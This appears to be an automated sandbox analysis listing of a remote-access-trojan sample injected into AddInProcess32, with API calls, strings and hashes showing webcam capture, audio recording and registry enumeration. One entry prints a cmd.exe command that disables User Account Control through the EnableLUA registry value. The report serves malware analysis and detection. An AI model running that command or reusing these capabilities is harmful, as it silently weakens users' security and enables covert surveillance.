                                                                                                    • Opcode Fuzzy Hash: 0684a22c1c03eddcd9e7afcbe452ed3b601dba84a8ad96751855c8c9c88a9e76
                                                                                                    • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                                                                                    APIs
                                                                                                    • RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                                    • GetLastError.KERNEL32 ref: 0041B335
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                    • String ID: 0$MsgWindowClass
                                                                                                    • API String ID: 2877667751-2410386613
                                                                                                    • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                                    • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                                                                                    • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                                                                                    • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                                                                                    APIs
                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                                                                      • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00437631
                                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                    • String ID: /zC
                                                                                                    • API String ID: 2633735394-4132788633
                                                                                                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                    • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                                                                                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                                                    • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                                                                                    • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                                                                                    • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem
                                                                                                    • String ID: ]tA
                                                                                                    • API String ID: 4116985748-3517819141
                                                                                                    • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                                    • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                                                                                    • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                                                                                    • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                                                                                    Strings
                                                                                                    • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$CreateProcess
                                                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                    • API String ID: 2922976086-4183131282
                                                                                                    • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                                                    • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                                                                                    • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                                                                                    • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 0044085A
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,?,?,0044078B,?), ref: 00440890
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                                                    • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                                                                                    • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                                                                                    • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405100
                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 0040510C
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405117
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E5A,00000001), ref: 00405120
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    Strings
                                                                                                    • Connection KeepAlive | Disabled, xrefs: 004050D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                    • String ID: Connection KeepAlive | Disabled
                                                                                                    • API String ID: 2993684571-3818284553
                                                                                                    • Opcode ID: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                                                                                    • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                                                                                    • Opcode Fuzzy Hash: 3c7acb05a4e0257c4243895fd0c0a32a1713874f0248c7c788b0d5ac90108107
                                                                                                    • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                                                                                    • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                                                                                    • Sleep.KERNEL32(00002710), ref: 00418DBD
                                                                                                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                    • String ID: Alarm triggered
                                                                                                    • API String ID: 614609389-2816303416
                                                                                                    • Opcode ID: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                                                                                    • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                                                                                    • Opcode Fuzzy Hash: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                                                                                    • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                                                                                    • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                                                                                    • Opcode Fuzzy Hash: 675a2b2e16e95726d0081b70f545144743ae2c0fe8ff8d83379613ee76e05ba8
                                                                                                    • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,0040BE20), ref: 004044A4
                                                                                                      • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologSleep
                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                                    • API String ID: 3469354165-3547787478
                                                                                                    • Opcode ID: 3c6e0af8ebbfc298dcb813e52702d2932fcffafe6d8050fdedad404bbeaea214
                                                                                                    • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                                                                                    • Opcode Fuzzy Hash: 3c6e0af8ebbfc298dcb813e52702d2932fcffafe6d8050fdedad404bbeaea214
                                                                                                    • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    • _free.LIBCMT ref: 00442318
                                                                                                    • _free.LIBCMT ref: 0044232F
                                                                                                    • _free.LIBCMT ref: 0044234E
                                                                                                    • _free.LIBCMT ref: 00442369
                                                                                                    • _free.LIBCMT ref: 00442380
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3033488037-0
                                                                                                    • Opcode ID: 000c1bca9b13ccd694f11e47c02294ab548f541d69de7e41b8c98ae91e9c4d15
                                                                                                    • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                                                                                    • Opcode Fuzzy Hash: 000c1bca9b13ccd694f11e47c02294ab548f541d69de7e41b8c98ae91e9c4d15
                                                                                                    • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                                                                                    APIs
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                                                    • _free.LIBCMT ref: 004468EC
                                                                                                      • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                                      • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                                    • _free.LIBCMT ref: 00446AB8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 1286116820-0
                                                                                                    • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                                                    • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                                                                                    • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                                                                                    • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                                                    • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                                                                                    • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                                                                                    • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6), ref: 0044E359
                                                                                                    • __alloca_probe_16.LIBCMT ref: 0044E391
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042BAB6,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?), ref: 0044E3E2
                                                                                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042BAB6,0042BAB6,?,00000002,00000000), ref: 0044E3F4
                                                                                                    • __freea.LIBCMT ref: 0044E3FD
                                                                                                      • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 313313983-0
                                                                                                    • Opcode ID: f22052c48b20844bcf7805a8dd425064624812f6fc49945599d826602f048cc9
                                                                                                    • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
                                                                                                    • Opcode Fuzzy Hash: f22052c48b20844bcf7805a8dd425064624812f6fc49945599d826602f048cc9
                                                                                                    • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
                                                                                                    APIs
                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                                                                                                    • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                                                                                                    • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                                                                                                    • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                                                                                                    • waveInStart.WINMM ref: 00401CDE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                    • String ID:
                                                                                                    • API String ID: 1356121797-0
                                                                                                    • Opcode ID: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
                                                                                                    • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
                                                                                                    • Opcode Fuzzy Hash: 59a9301f6b22a734be5a3effd034760cdc07b4e3e04a7ca18e049b399c1f331a
                                                                                                    • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                                                                                                      • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                                                                                                    • _free.LIBCMT ref: 0044C59F
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: f621696769241118c45f65325c7b27da8ee63df96944c3361d7eb2b7a533e746
                                                                                                    • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
                                                                                                    • Opcode Fuzzy Hash: f621696769241118c45f65325c7b27da8ee63df96944c3361d7eb2b7a533e746
                                                                                                    • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                                                                                                    • int.LIBCPMT ref: 0040FBE8
                                                                                                      • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                                                                      • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0040FC28
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2536120697-0
                                                                                                    • Opcode ID: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                                                                                    • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
                                                                                                    • Opcode Fuzzy Hash: 32d331dee3c396e979eb1c936d77adf0263c25033da8a89480af8e78189b82f1
                                                                                                    • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0044DBB4
                                                                                                      • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                                      • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                                    • _free.LIBCMT ref: 0044DBC6
                                                                                                    • _free.LIBCMT ref: 0044DBD8
                                                                                                    • _free.LIBCMT ref: 0044DBEA
                                                                                                    • _free.LIBCMT ref: 0044DBFC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                                                    • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
                                                                                                    • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
                                                                                                    • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00441566
                                                                                                      • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                                      • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                                    • _free.LIBCMT ref: 00441578
                                                                                                    • _free.LIBCMT ref: 0044158B
                                                                                                    • _free.LIBCMT ref: 0044159C
                                                                                                    • _free.LIBCMT ref: 004415AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                                                    • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                                                                                    • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                                                                                    • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                                                                                    APIs
                                                                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Enum$InfoQueryValue
                                                                                                    • String ID: [regsplt]
                                                                                                    • API String ID: 3554306468-4262303796
                                                                                                    • Opcode ID: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
                                                                                                    • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
                                                                                                    • Opcode Fuzzy Hash: d343e865f475c493740503b4c15cefb95b525cea04b1a81ae632fced6ef23d5c
                                                                                                    • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
                                                                                                    APIs
                                                                                                    • _strpbrk.LIBCMT ref: 0044B918
                                                                                                    • _free.LIBCMT ref: 0044BA35
                                                                                                      • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,004050E3,?,00000000,00000000,00402086,00000000,00000000,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                                                                                                      • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417,?,004050E3), ref: 00439AC7
                                                                                                      • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000,?,004050E3), ref: 00439ACE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
